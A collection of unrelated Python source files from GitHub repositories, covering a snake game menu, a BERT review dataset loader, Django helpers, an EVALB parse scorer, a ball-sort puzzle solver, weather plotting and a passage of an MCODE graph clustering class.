def easy():
import easy
pygame.init()
def medium():
import medium
pygame.init()
def hard():
import hard
pygame.init()
def setlevel(leveltype):
if leveltype == "E":
print("Welcome to Easy Mode!")
easy()
elif leveltype == "M":
print("Welcome to Medium Mode!")
medium()
elif leveltype == "H":
print("Welcome to Hard Mode!")
hard()
else:
print("INVALID INPUT:", leveltype)
main() | fruitycoders/snake | snake/main.py | main.py | py | 1,957 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "time.sleep",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "pygame.init",
"line_number": 65,
"usage_type": "call"
},
{
"api_name": "pygame.init",
"line_number": 68,
"usage_type": "call"
},
{
"api_name": "pygame.init",
"line_number": 7... |
11976253992 | from matplotlib import pyplot as plt
import torch
from torch.utils.data import Dataset as torchDataset
import pandas as pd
from transformers import BertTokenizer, BertModel
import Config
tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')
model = BertModel.from_pretrained('bert-base-uncased').to(Config.device)
class CsvDataset(torchDataset):
def __init__(self,csv_path,read_columns = True,sp = ','):
super(CsvDataset, self).__init__()
self.dataTell = []
if csv_path == None:
return
print("[npc report]read data...",end = '')
self.raw_lines = open(csv_path,"r",encoding="utf8").read().split('\n')
print("done.")
def __splitLine__(line,sp = ','):
exist_quotation = False
ll = len(line)
lst = 0
res = []
for i in range(1,ll):
if line[i] == sp and not exist_quotation:
res.append(line[lst:i])
lst = i + 1
elif line[i] == '"':
exist_quotation = not exist_quotation
res.append(line[lst:])
return res
def __getitem__(self, idx: int):
try:
label,txt = CsvDataset.__splitLine__(self.raw_lines[idx])
tl = 1 if label == "True" else 0
inputs = tokenizer(txt ,padding = 'max_length', return_tensors='pt',truncation = True).to(Config.device)
with torch.no_grad():
embedding = model(**inputs).last_hidden_state
return embedding,torch.Tensor([[tl,1-tl]]).to(Config.device)
except Exception as e:
print("[npc report] Unhandle Eorr:",e,"auto handle:","skip")
return -1,-1
def __len__(self) -> int:
return len(self.raw_lines)
def collate_func(self,batch_dic):
xs,ys = [],[]
for x,y in batch_dic:
if type(x) == type(-1):
continue
xs.append(x.unsqueeze(0))
ys.append(y)
return torch.cat(xs,dim=0),torch.cat(ys,dim=0)
def Split(self,testPor = 0.3):
train,test = CsvDataset(None),CsvDataset(None)
half = int(len(self)* 0.5) # 1000
spl = int(half * (1 -testPor)) # 700
train.raw_lines = self.raw_lines[:spl] + self.raw_lines[half:half + spl]
test.raw_lines = self.raw_lines[spl:half] + self.raw_lines[-(half - spl):]
return train,test
def Merge(dtls:list):
res = CsvDataset(None)
res.raw_lines = []
for dt in dtls:
res.raw_lines += dt.raw_lines
return res
class PdCsvDataset(torchDataset):
def __init__(self,csv_path = None):
super(PdCsvDataset, self).__init__()
self.dataidx = []
self.labels = []
if csv_path != None:
self.csv = pd.read_csv(csv_path,sep=',')
self.statistics()
def collate_func(self,batch_dic):
xs,ys = [],[]
for x,y in batch_dic:
xs.append(x.unsqueeze(0).unsqueeze(0))
ys.append(y.unsqueeze(0))
return torch.cat(xs,dim=0),torch.cat(ys,dim=0)
def statistics(self,read_num = 1000,cls = "reviews.doRecommend"):
tabu = {}
for idx,cls in enumerate(self.csv[cls]):
if type(cls) != type(True):
continue
print(self.csv.iloc[idx]["reviews.text"])
inputs = tokenizer(self.csv.iloc[idx]["reviews.text"], return_tensors='pt')
if len(inputs) > 47:
continue
if cls in tabu.keys():
if tabu[cls] <= read_num:
self.dataidx.append(idx)
self.labels.append(cls)
tabu[cls] += 1
else:
tabu.setdefault(cls,1)
self.labels.append(cls)
self.clses = list(tabu.keys())
self.tabu = tabu
print("[npc report] PdCsvDataset stat :",tabu)
def __getitem__(self, index: int):
idx = self.dataidx[index]
tl = 1 if self.labels[index] else 0
inputs = tokenizer(self.csv.iloc[idx]["reviews.text"], return_tensors='pt')
with torch.no_grad():
embedding = model(**inputs).last_hidden_state
c,h,w = embedding.shape
if h < 46:
embedding = torch.cat([embedding,torch.zeros(1,46- h,w)],dim = 1)
return embedding[0,:46,:],torch.Tensor([tl,1-tl])
def __len__(self) -> int:
return len(self.dataidx)
def Split(self,testPor = 0.3):
train,test = PdCsvDataset(None),PdCsvDataset(None)
half = int(len(self)* 0.5) # 1000
spl = int(half * (1 -testPor)) # 700
train.labels = self.labels[:spl] + self.labels[half:half + spl]
train.dataidx = self.dataidx[:spl] + self.dataidx[half:half + spl]
train.csv = self.csv
test.labels = self.labels[spl:half] + self.labels[-(half - spl):]
test.dataidx = self.dataidx[spl:half] + self.dataidx[-(half - spl):]
test.csv = self.csv
return train,test
if __name__ == "__main__":
count = 0
pcsv = PdCsvDataset("../dataset.csv")
print(len(pcsv))
# txt,cls = pcsv[0]
# inputs = tokenizer("It is the time you have wasted for your rose that makes your rose so important.", return_tensors='pt')
# with torch.no_grad():
# all_encoder_layers = model(**inputs)
# print(all_encoder_layers.last_hidden_state)
plty1 = []
plty2 = []
x = []
count = 0
for txt,cls in pcsv:
x.append(count)
count+=1
plty1.append(txt.shape[1])
plty2.append(txt.shape[2])
print(sum(plty1)/len(plty1),sum(plty2)/len(plty2))
plt.plot(x,plty1,color = 'red')
plt.plot(x,plty2,color = 'green')
plt.show() | NPCLEI/Fed_MSCNN | DatasetAPI/AmazonReviews.py | AmazonReviews.py | py | 5,781 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "transformers.BertTokenizer.from_pretrained",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "transformers.BertTokenizer",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "transformers.BertModel.from_pretrained",
"line_number": 9,
"usage_typ... |
5232873316 | from django.core.mail import EmailMessage
TITLE = [
('Mr', 'Mr'),
('Mrs', 'Mrs'),
('Ms', 'Ms'),
('Dr', 'Dr'),
]
EXPERTISE = [
('UI/UX Design', 'UI/UX Design'),
('Product Design', 'Product Design'),
('AI Design', 'AI Design'),
]
MENTORSHIP_AREAS = [
('Career Advice', 'Career Advice'),
('Portfolio Review', 'Portfolio Review'),
('Interview Techniques', 'Interview Techniques'),
]
USER_TYPE = [('mentor', 'mentor'), ('member', 'member')]
MENTOR_STATUS = [('n/a', 'not applicable'), ('pending', 'pending'),
('approved', 'approved'), ('denied', 'denied')]
class Util:
@staticmethod
def send_email(data):
email = EmailMessage(
subject=data['email_subject'],
body=data['email_body'],
to=(data['to_email'],))
email.send()
| bbrighttaer/adplisttest | authentication/utils.py | utils.py | py | 840 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "django.core.mail.EmailMessage",
"line_number": 32,
"usage_type": "call"
}
] |
41489962994 | import os
import shutil
import subprocess
import tempfile
from typing import List
from phrasetree.tree import Tree
from elit.metrics.f1 import F1
from elit.metrics.metric import Metric
from elit.utils.io_util import get_resource, run_cmd
from elit.utils.log_util import cprint
class EvalbBracketingScorer(Metric):
"""
This class uses the external EVALB software for computing a broad range of metrics
on parse trees. Here, we use it to compute the Precision, Recall and F1 metrics.
You can download the source for EVALB from here: <https://nlp.cs.nyu.edu/evalb/>.
Note that this software is 20 years old. In order to compile it on modern hardware,
you may need to remove an `include <malloc.h>` statement in `evalb.c` before it
will compile.
AllenNLP contains the EVALB software, but you will need to compile it yourself
before using it because the binary it generates is system dependent. To build it,
run `make` inside the `allennlp/tools/EVALB` directory.
Note that this metric reads and writes from disk quite a bit. You probably don't
want to include it in your training loop; instead, you should calculate this on
a validation set only.
# Parameters
evalb_directory_path : `str`, required.
The directory containing the EVALB executable.
evalb_param_filename : `str`, optional (default = `"COLLINS.prm"`)
The relative name of the EVALB configuration file used when scoring the trees.
By default, this uses the nk.prm configuration file which comes with LAL-Parser.
This configuration ignores POS tags, S1 labels and some punctuation labels.
evalb_num_errors_to_kill : `int`, optional (default = `"10"`)
The number of errors to tolerate from EVALB before terminating evaluation.
"""
def __init__(
self,
evalb_directory_path: str = None,
evalb_param_filename: str = "nk.prm",
evalb_num_errors_to_kill: int = 10,
) -> None:
if not evalb_directory_path:
evalb_directory_path = get_resource('https://github.com/KhalilMrini/LAL-Parser/archive/master.zip#EVALB/')
self._evalb_directory_path = evalb_directory_path
self._evalb_program_path = os.path.join(evalb_directory_path, "evalb")
self._evalb_param_path = os.path.join(evalb_directory_path, evalb_param_filename)
self._evalb_num_errors_to_kill = evalb_num_errors_to_kill
self._header_line = [
"ID",
"Len.",
"Stat.",
"Recal",
"Prec.",
"Bracket",
"gold",
"test",
"Bracket",
"Words",
"Tags",
"Accracy",
]
self._correct_predicted_brackets = 0.0
self._gold_brackets = 0.0
self._predicted_brackets = 0.0
def __call__(self, predicted_trees: List[Tree], gold_trees: List[Tree]) -> None: # type: ignore
"""
# Parameters
predicted_trees : `List[Tree]`
A list of predicted NLTK Trees to compute score for.
gold_trees : `List[Tree]`
A list of gold NLTK Trees to use as a reference.
"""
if not os.path.exists(self._evalb_program_path):
cprint(f"EVALB not found at {self._evalb_program_path}. Attempting to compile it.")
EvalbBracketingScorer.compile_evalb(self._evalb_directory_path)
# If EVALB executable still doesn't exist, raise an error.
if not os.path.exists(self._evalb_program_path):
compile_command = (
f"python -c 'from allennlp.training.metrics import EvalbBracketingScorer; "
f'EvalbBracketingScorer.compile_evalb("{self._evalb_directory_path}")\''
)
raise RuntimeError(
f"EVALB still not found at {self._evalb_program_path}. "
"You must compile the EVALB scorer before using it."
" Run 'make' in the '{}' directory or run: {}".format(
self._evalb_program_path, compile_command
)
)
tempdir = tempfile.mkdtemp()
gold_path = os.path.join(tempdir, "gold.txt")
predicted_path = os.path.join(tempdir, "predicted.txt")
with open(gold_path, "w") as gold_file:
for tree in gold_trees:
gold_file.write(f"{tree.pformat(margin=1000000)}\n")
with open(predicted_path, "w") as predicted_file:
for tree in predicted_trees:
predicted_file.write(f"{tree.pformat(margin=1000000)}\n")
command = [
self._evalb_program_path,
"-p",
self._evalb_param_path,
"-e",
str(self._evalb_num_errors_to_kill),
gold_path,
predicted_path,
]
completed_process = run_cmd(' '.join(command))
_correct_predicted_brackets = 0.0
_gold_brackets = 0.0
_predicted_brackets = 0.0
for line in completed_process.split("\n"):
stripped = line.strip().split()
if len(stripped) == 12 and stripped != self._header_line:
# This line contains results for a single tree.
numeric_line = [float(x) for x in stripped]
_correct_predicted_brackets += numeric_line[5]
_gold_brackets += numeric_line[6]
_predicted_brackets += numeric_line[7]
shutil.rmtree(tempdir)
self._correct_predicted_brackets += _correct_predicted_brackets
self._gold_brackets += _gold_brackets
self._predicted_brackets += _predicted_brackets
def get_metric(self):
"""
# Returns
The average precision, recall and f1.
"""
return F1(self._predicted_brackets, self._gold_brackets, self._correct_predicted_brackets)
def reset(self):
self._correct_predicted_brackets = 0.0
self._gold_brackets = 0.0
self._predicted_brackets = 0.0
@staticmethod
def compile_evalb(evalb_directory_path: str = None):
os.system("cd {} && make && cd ../../../".format(evalb_directory_path))
run_cmd('chmod +x ' + os.path.join(evalb_directory_path, "evalb"))
@staticmethod
def clean_evalb(evalb_directory_path: str = None):
return run_cmd("rm {}".format(os.path.join(evalb_directory_path, "evalb")))
@property
def score(self):
return self.get_metric().prf[-1]
def __repr__(self) -> str:
return str(self.get_metric())
def main():
tree1 = Tree.fromstring("(S (NP (D the) (N dog)) (VP (V chased) (NP (D the) (N cat))))")
tree2 = Tree.fromstring("(S (NP (D the) (N dog)) (VP (V chased) (NP (D the) (N cat))))")
evalb_scorer = EvalbBracketingScorer()
evalb_scorer([tree1], [tree2])
metrics = evalb_scorer.get_metric()
assert metrics.prf == (1.0, 1.0, 1.0)
tree1 = Tree.fromstring("(S (VP (D the) (NP dog)) (VP (V chased) (NP (D the) (N cat))))")
tree2 = Tree.fromstring("(S (NP (D the) (N dog)) (VP (V chased) (NP (D the) (N cat))))")
evalb_scorer = EvalbBracketingScorer()
evalb_scorer([tree1], [tree2])
metrics = evalb_scorer.get_metric()
assert metrics.prf == (0.75, 0.75, 0.75)
tree1 = Tree.fromstring("(S (VP (D the) (NP dog)) (VP (V chased) (NP (D the) (N cat))))")
tree2 = Tree.fromstring("(S (NP (D the) (N dog)) (VP (V chased) (NP (D the) (N cat))))")
evalb_scorer = EvalbBracketingScorer()
evalb_scorer([tree1, tree2], [tree2, tree2])
metrics = evalb_scorer.get_metric()
assert metrics.prf == (0.875, 0.875, 0.875)
if __name__ == '__main__':
main()
| emorynlp/seq2seq-corenlp | elit/metrics/parsing/evalb_bracketing_scorer.py | evalb_bracketing_scorer.py | py | 7,748 | python | en | code | 13 | github-code | 1 | [
{
"api_name": "elit.metrics.metric.Metric",
"line_number": 15,
"usage_type": "name"
},
{
"api_name": "elit.utils.io_util.get_resource",
"line_number": 52,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 54,
"usage_type": "call"
},
{
"api_name"... |
70861870115 | """A modified BFS algorithm for the Android Bubble Sort Puzzle Solver."""
from collections import deque
from solver.trie import Trie
from solver.state import is_solved_state
from solver.state import count_finished_tubes
from solver.state import get_next_states
class QuantizedDoubleEndedPriorityQueue:
"""A Quantized version of the deque data structure."""
def __init__(self):
"""Create a QuantizedDoubleEndedPriorityQueue."""
self.d = {}
self.count = 0
def add(self, rank, state, moves):
"""Add a state to QuantizedDoubleEndedPriorityQueue."""
if rank not in self.d:
self.d[rank] = deque()
self.d[rank].append((state, moves))
self.count += 1
def get(self):
"""Return the next state to be checked."""
rank = max(self.d.keys())
ret = self.d[rank].popleft()
if len(self.d[rank]) == 0:
del self.d[rank]
self.count -= 1
return ret
def bfs(initial_state):
"""Run the modified BFS algorithm."""
states = QuantizedDoubleEndedPriorityQueue()
rank = count_finished_tubes(initial_state)
states.add(rank, initial_state, [])
visited_states = Trie()
while states.count > 0:
# print("#" * (len(states) // 100))
# print("#" * (len(visited_state_strings) // 10))
state, moves = states.get()
# print("")
# print("")
# print(f"BFS state is: {state}")
if visited_states.contains(state):
continue
if is_solved_state(state):
return moves
visited_states.add(state)
for next_state, next_moves in get_next_states(state, moves):
if visited_states.contains(next_state):
continue
rank = count_finished_tubes(next_state)
states.add(rank, next_state, next_moves)
| batzilo/android-ball-sort-puzzle-solver | solver/bfs.py | bfs.py | py | 1,880 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "collections.deque",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "solver.state.count_finished_tubes",
"line_number": 43,
"usage_type": "call"
},
{
"api_name": "solver.trie.Trie",
"line_number": 46,
"usage_type": "call"
},
{
"api_name": "... |
18088940221 | from model import db_connection
from helper import id_generator,paginated_results
from flask import Flask, request
class Contacts:
def __init__(self):
self.db=db_connection.Database()
def record_exists(self,field,data):
count = self.db.get_doc_count("contacts",field,data)
if count:
return True
return False
def generate_id(self):
id = id_generator.ran_gen()
while True:
if self.record_exists("contact_id",id):
id = id_generator.ran_gen()
else:
return id
def create_contact(self,input):
output ={"status": "" , "message" : ""}
try:
name=input['name']
email=input['email']
user=input['user']
if self.record_exists("email",email):
output["status"] = "error"
output["message"] = "Email Exists"
else:
data_to_insert = {}
data_to_insert['contact_id'] = self.generate_id()
data_to_insert['name'] = name
data_to_insert['email'] = email
self.db.insert_one_data("contacts",data_to_insert)
self.db.insert_one_to_array("users","user",user,"contacts",data_to_insert['contact_id'])
output["status"] = "success"
except:
output["status"] = "success"
return output
def remove_contact(self,input):
output ={"status": "" , "message" : ""}
try:
user=input['user']
contact_id=input['contact_id']
self.db.delete_one_from_array("users","user",user,"contacts",contact_id)
output["status"] = "success"
except :
output["status"] = "error"
return output
def list_contact(self,input):
output ={"status": "" , "message" : ""}
try:
try:
page = int(request.args.get("page"))
except:
page = 1
try:
limit = int(request.args.get("limit"))
except:
limit = 10
user=input['user']
query={"user":user}
contact_ids = self.db.get_values("users",query,["contacts"],["_id"])[0]['contacts']
query={"contact_id":{"$in":contact_ids}}
contacts = self.db.get_values("contacts",query,["contact_id","name","email"],["_id"])
output["results"]= paginated_results.paginated_results(contacts,page,limit)
output["status"] = "success"
except:
output["status"] = "error"
return output
def search_contact(self,input):
output ={"status": "" , "message" : ""}
try:
search_string = input['search_string']
output["results"] = self.db.search("contacts",search_string)
output["status"] = "success"
except:
output["status"] = "error"
return output
def update_contact(self,input):
output ={"status": "" , "message" : ""}
try:
fields_to_update = input['fields_to_update']
contact_id = input['contact_id']
new_fields = {}
for field in fields_to_update:
new_fields[field] = input[field]
self.db.update_one("contacts","contact_id",contact_id,new_fields)
output["status"] = "success"
except:
output["status"] = "error"
return output
def add_contacts(self,input):
output ={"status": "" , "message" : ""}
try:
contact_ids = input['contact_ids']
user=input['user']
self.db.insert_many_to_array("users","user",user,"contacts",contact_ids)
output["status"] = "success"
except :
output["status"] = "error"
return output
| rahulkaliyath/contact-book-server | controllers/contacts.py | contacts.py | py | 4,014 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "model.db_connection.Database",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "model.db_connection",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "helper.id_generator.ran_gen",
"line_number": 17,
"usage_type": "call"
},
{
"api_na... |
73502727075 | # --------------------------------
# Name: plot_sbcape_loop.py
# Author: Robert M. Frost
# NOAA Global Systems Laboratory
# Created: 26 June 2023
# Purpose: Loop to plot 2m dew point
# and wind barb comparisons at
# different times during forecast runs
# --------------------------------
from UFSutils import read_grib
import matplotlib.pyplot as plt
from matplotlib import rc
import cartopy.crs as ccrs
import cartopy.feature as cpf
import seaborn
import numpy as np
import geopandas as gpd
# --------------------------------
# settings
# date being plot
date = "2023041912" #YYYMMDDHH
# hour forecast was initialized (UTC)
init = 12
# directory where hrrr grib data are located
dgrib_h = f"/scratch2/BMC/fv3lam/Robby.Frost/expt_dirs/{date}_3km_hrrrphys/{date}/postprd/"
# directory where rap grib data are located
dgrib_r = f"/scratch2/BMC/fv3lam/Robby.Frost/expt_dirs/{date}_3km_rapphys/{date}/postprd/"
# natlev or prslev
nat_prs = "natlev"
# message number for dew point
mn_td2m = 1358
# message number for u at 10m
mn_u10 = 1364
# message number for v at 10m
mn_v10 = 1365
# directory for figure to be output
figdir = f"/scratch2/BMC/fv3lam/Robby.Frost/figures/{date}/td2m/"
# --------------------------------
# plotting setup
rc('font',weight='normal',size=12.5)
# rc('text',usetex='True')
rc('figure',facecolor='white')
# --------------------------------
# NWS dew point colorbar
import matplotlib.colors as colors
a = np.array([0,10,20,30,40,45,50,55,60,65,70,75,80])
# Normalize the bin between 0 and 1 (uneven bins are important here)
norm = [(float(i)-min(a))/(max(a)-min(a)) for i in a]
# Color tuple for every bin
C = np.array([[59,34,4],
[84,48,5],
[140,82,10],
[191,129,45],
[204,168,84],
[223,194,125],
[230,217,181],
[211,235,231],
[169,219,211],
[114,184,173],
[49,140,133],
[1,102,95],
[0,60,48],
[0,41,33]])
# Create a tuple for every color indicating the normalized position on the colormap and the assigned color.
COLORS = []
for i, n in enumerate(norm):
COLORS.append((n, np.array(C[i])/255.))
# Create the colormap
cmap = colors.LinearSegmentedColormap.from_list("dewpoint", COLORS)
# --------------------------------
# loop over time
for hr in range(0,37):
print(f"Hour {hr}")
# read in dew point
hrrr, td2m_h, lat, lon, valid_date = read_grib(init, hr, dgrib_h, nat_prs, mn_td2m, ret_type=0)
rap, td2m_r, lat, lon, valid_date = read_grib(init, hr, dgrib_r, nat_prs, mn_td2m, ret_type=0)
# convert to fahrenheit (superior unit of temperature)
td2m_h = (td2m_h.values - 273.15) * (9/5) + 32
td2m_r = (td2m_r.values - 273.15) * (9/5) + 32
# read in 10m wind
u10_h = hrrr[mn_u10].values
v10_h = hrrr[mn_v10].values
u10_r = rap[mn_u10].values
v10_r = rap[mn_v10].values
# convert 10m wind to knots
u10_h = u10_h * 1.944
v10_h = v10_h * 1.944
u10_r = u10_r * 1.944
v10_r = v10_r * 1.944
# --------------------------------
# Plot dew point comparison
print(f"Creating 1 x 2 Td2m Plot")
# Define your custom colorbar bounds
cbar_min = 0
cbar_max = 80.1
# levels for sbcape to be plot
clevs = np.arange(cbar_min, cbar_max, 2)
# create plot
fig, ax = plt.subplots(ncols=2, subplot_kw={'projection': ccrs.PlateCarree()},
figsize=(16,10), constrained_layout=True)
# plot HRRR
c0 = ax[0].contourf(lon, lat, td2m_h, clevs,
transform=ccrs.PlateCarree(),
cmap=cmap, extend="both")
# plot RAP
c1 = ax[1].contourf(lon, lat, td2m_r, clevs,
transform=ccrs.PlateCarree(),
cmap=cmap, extend="both")
# mapping
plt_area = [-101, -94, 30, 37.5] # W, E, S, N
for i, iax in enumerate(ax):
iax.coastlines()
iax.add_feature(cpf.BORDERS)
iax.add_feature(cpf.STATES)
iax.set_extent(plt_area)
# Load the json file with county coordinates
geoData = gpd.read_file('https://raw.githubusercontent.com/holtzy/The-Python-Graph-Gallery/master/static/data/US-counties.geojson')
geoData.plot(ax=iax, color="none", lw=0.3, aspect=1)
# set title
ax[0].set_title(f"No-GF F0{hr}, Valid {valid_date} UTC")
ax[1].set_title(f"GF F0{hr}, Valid {valid_date} UTC")
# Add colorbar
cbar = fig.colorbar(c1, ax=ax, orientation='horizontal', extend=True, pad=0.03, aspect=50)
cbar.set_label('2m Dew Point Temperature [$^{\circ}$F]')
cbar.set_ticks(np.arange(cbar_min, cbar_max, 10))
# Wind barbs
spacing=25 #barbspacing (smaller if zoomed in)
ax[0].barbs(lon[::spacing,::spacing], lat[::spacing,::spacing],
u10_h[::spacing,::spacing], v10_h[::spacing,::spacing],
length=6)
ax[1].barbs(lon[::spacing,::spacing], lat[::spacing,::spacing],
u10_r[::spacing,::spacing], v10_r[::spacing,::spacing],
length=6)
# save and close figure
figdir_full = f"{figdir}td2m_sidebyside_f{hr}.png"
print(f"Saving figure to {figdir_full}")
plt.savefig(figdir_full)
plt.close()
print("Finished plotting 1 x 2 Td2m!")
# --------------------------------
# Plot dew point comparison
print("Creating Td2m Difference Plot!")
# Define your custom colorbar bounds
cbar_min = -30
cbar_max = 30.1
# contour levels
clevs = np.linspace(cbar_min, cbar_max, 50)
# color palette
colors = seaborn.color_palette("seismic", as_cmap=True)
# create plot
fig, ax = plt.subplots(subplot_kw={'projection': ccrs.PlateCarree()},
figsize=(10,6.5), constrained_layout=True)
# plot HRRR - RAP
c0 = ax.contourf(lon, lat, td2m_h - td2m_r,
clevs, transform=ccrs.PlateCarree(),
cmap=colors, extend="both")
# mapping
plt_area = [-101, -94, 33.5, 37.5] # W, E, S, N
ax.coastlines()
ax.add_feature(cpf.BORDERS)
ax.add_feature(cpf.STATES)
ax.set_extent(plt_area)
# Load the json file with county coordinates
geoData = gpd.read_file('https://raw.githubusercontent.com/holtzy/The-Python-Graph-Gallery/master/static/data/US-counties.geojson')
geoData.plot(ax=ax, color="none", lw=0.3, aspect=1)
# set title
ax.set_title(f"HRRR - RAP F0{hr}, Valid {valid_date} UTC")
# Add colorbar
cbar = fig.colorbar(c0, ax=ax, orientation='horizontal', extend=True, pad=0.03, aspect=50)
cbar.set_label('HRRR - RAP 2m Dew Point Temperature [$^{\circ}$F]')
cbar.set_ticks(np.arange(cbar_min, cbar_max, 5))
# save and close figure
figdir_full = f"{figdir}td2m_diff_f{hr}.png"
print(f"Saving figure to {figdir_full}")
plt.savefig(figdir_full)
plt.close()
print(f"Finished with hour {hr}! \n") | robbyfrost/plotting_ufs | plot_td2m_loop.py | plot_td2m_loop.py | py | 6,930 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "matplotlib.rc",
"line_number": 41,
"usage_type": "call"
},
{
"api_name": "matplotlib.rc",
"line_number": 43,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 48,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_numbe... |
4904615211 | """ Livestock Animal Pens """
#Django
from django.db import models
ORIENTATION_CHOICES = (
('Norte','Norte'),
('Sur','Sur'),
('Este','Este'),
('Oeste','Oeste')
)
class LivestockAnimalPens(models.Model):
""" Modelo de Corrales de animales
de la produccion ganadera """
production_livestock = models.ForeignKey(
"producer.ProductionLivestock",
related_name="livestock_animal_pens",
on_delete=models.CASCADE
)
orientation = models.CharField(max_length=20, blank=True, null=True)
building_material = models.CharField(max_length=50, blank=True, null=True)
roof_material = models.CharField(max_length=30, blank=True, null=True)
foor_material = models.CharField(max_length=30, blank=True, null=True)
surface = models.FloatField(default=0)
num_animals = models.PositiveIntegerField(default=0)
lat = models.FloatField(default=0)
lng = models.FloatField(default=0)
| tapiaw38/agrapi | producer/models/livestock_animal_pens.py | livestock_animal_pens.py | py | 956 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "django.db.models.Model",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "django.db.models",
"line_number": 14,
"usage_type": "name"
},
{
"api_name": "django.db.models.ForeignKey",
"line_number": 18,
"usage_type": "call"
},
{
"api_name... |
22892777110 | from mpl_toolkits.mplot3d import Axes3D
import matplotlib.pyplot as plt
import numpy as np
import os
import time
fig = plt.figure()
plt.ion()
ax = fig.add_subplot(111, projection='3d')
ax.grid(False)
for root, folder, files in os.walk("./results/features"):
for file in sorted(files):
if ".npy" not in file:
continue
p = np.load(os.path.join("./results/features",file))
p = np.reshape(p, (13,3))
ax.clear()
ax.grid(False)
ax.set_xlim([-1, 1])
ax.set_ylim([-1, 1])
ax.set_zlim([-1, 1])
ax.scatter(p[:,0],p[:,1],p[:,2])
plt.draw()
plt.pause(1)
plt.show()
| zhuimengshaonian666/view_synthesis | vis.py | vis.py | py | 671 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "matplotlib.pyplot.figure",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.ion",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "matplot... |
16287113588 | #!/usr/bin/env python
from __future__ import absolute_import
from __future__ import print_function
import numpy as np
import pandas as pd
import re
import util
import os
import entrez as ez
from xgmml import *
import parallel
import db
from six.moves import range
import setting
class MCODECluster(Network):
def __init__(self, network, seedNode=None, score=0.0):
self.seedNode=seedNode
self.score=score or 0.0
super(MCODECluster, self).__init__(network)
def __str__(self):
s="SeedNode: "+self.seedNode+"\n"
s+="Score: "+str(self.score)+"\n"
s+=super(MCODECluster, self).__str__()
return s
class MCODE(Network):
#the parameters used for this instance of the algorithm
params = {
'includeLoops': False,
'degreeCutoff': 2,
'kCore': 2, # kCore must be greater than 1
'maxDepthFromStart': 100,
'nodeScoreCutoff': 0.2,
'fluff': False,
'haircut': True,
'fluffNodeDensityCutoff': 0.1
}
def get_max_score(self):
return self.C_nodeByScore[0][0]
@staticmethod
def calc_density(gpInputGraph, includeLoops=False):
if (gpInputGraph.is_empty()): return -1.0
loopCount=0
if includeLoops:
S_node=gpInputGraph.nodes()
for node in S_node:
if (gpInputGraph.are_neighbors(node, node)): loopCount+=1
n=gpInputGraph.nof_nodes()
possibleEdgeNum = n**2
actualEdgeNum = gpInputGraph.nof_edges() - loopCount
return actualEdgeNum*1.0/possibleEdgeNum
def score_network(self, network):
numNodes = network.nof_nodes()
density = MCODE.calc_density(network, self.params['includeLoops'])
score = density * numNodes
return score
@staticmethod
def get_KCore(gpInputGraph, k):
if (gpInputGraph is None or gpInputGraph.is_empty()):
util.error_msg("GetKCore(): no input network!")
#filter all nodes with degree less than k until convergence
firstLoop = True
gpOutputGraph = None
while True:
numDeleted = 0
S_node = gpInputGraph.nodes()
alCoreNodes=[node for node in S_node if len(gpInputGraph.data[node]) >= k]
# ZHOU 3/16/2018
if len(alCoreNodes)<k: return None
#
if (len(S_node)>len(alCoreNodes) or firstLoop):
gpOutputGraph = gpInputGraph.subnetwork(alCoreNodes)
if (gpOutputGraph.is_empty()): return None
#iterate again, but with a new k-core input graph
gpInputGraph = gpOutputGraph
firstLoop = False
else:
#stop the loop
break
return gpOutputGraph
def get_highest_KCore(self, gpInputGraph):
S_md5=[]
if self.l_cache:
s_md5=gpInputGraph.node_MD5()
S_md5.append(s_md5)
if s_md5 in self.cache_kcore:
k=self.cache_kcore[s_md5]
gpPrevCore=MCODE.get_KCore(gpInputGraph, k)
return {'k':self.cache_kcore[s_md5], 'network':gpPrevCore}
gpCurCore=gpPrevCore=None
### ZHOU 3/16/2018 tries to speed things up, find the max possible k
R_degree=np.array([gpInputGraph.degree(x) for x in gpInputGraph.nodes()])
if len(R_degree)==0: return {'k':0, 'network':gpPrevCore}
# https://stackoverflow.com/questions/26984414/efficiently-sorting-a-numpy-array-in-descending-order/26984520
R_degree[::-1].sort()
# if k is a max, then there must be at least k nodes with degrees >= k
lb=ub=R_degree[-1]
if lb==0: exit()
# all degrees in tmp are possible k, so we use max(tmp)
tmp=R_degree[R_degree<=np.arange(1,len(R_degree)+1)]
if len(tmp)>0:
ub=max(tmp)
# Be aware if candidates [5 5 5 2 2 2], max k can be 3, not in the candidate list
# the above tmp will give ub=2, so we need to find the closest failure
tmp2=R_degree[R_degree>ub]
if len(tmp2): ub=min(tmp2)-1
gpPrevCore=MCODE.get_KCore(gpInputGraph, lb)
while (lb<ub): # lb is already a solution, ub has not been explored yet
k=max(lb+1, int(lb*0.3+ub*0.7)) # empirically seems a bit better to bias towards ub
#print("Try: ", k, "[", lb, ub, "]")
gpCurCore = MCODE.get_KCore(gpInputGraph, k)
if gpCurCore is None or gpCurCore.is_empty():
#print("fail")
ub=k-1
else:
gpPrevCore = gpCurCore
gpInputGraph=gpCurCore # let's shrink the search space
# use cache to avoid recomputing.
if self.l_cache:
s_md5=gpInputGraph.node_MD5()
S_md5.append(s_md5)
if s_md5 in self.cache_kcore:
k=self.cache_kcore[s_md5]
gpPrevCore=MCODE.get_KCore(gpInputGraph, k)
lb=ub=k
lb=k
#while True:
# gpCurCore = MCODE.get_KCore(gpInputGraph, i)
# if gpCurCore is None or gpCurCore.is_empty(): break
# gpPrevCore = gpCurCore
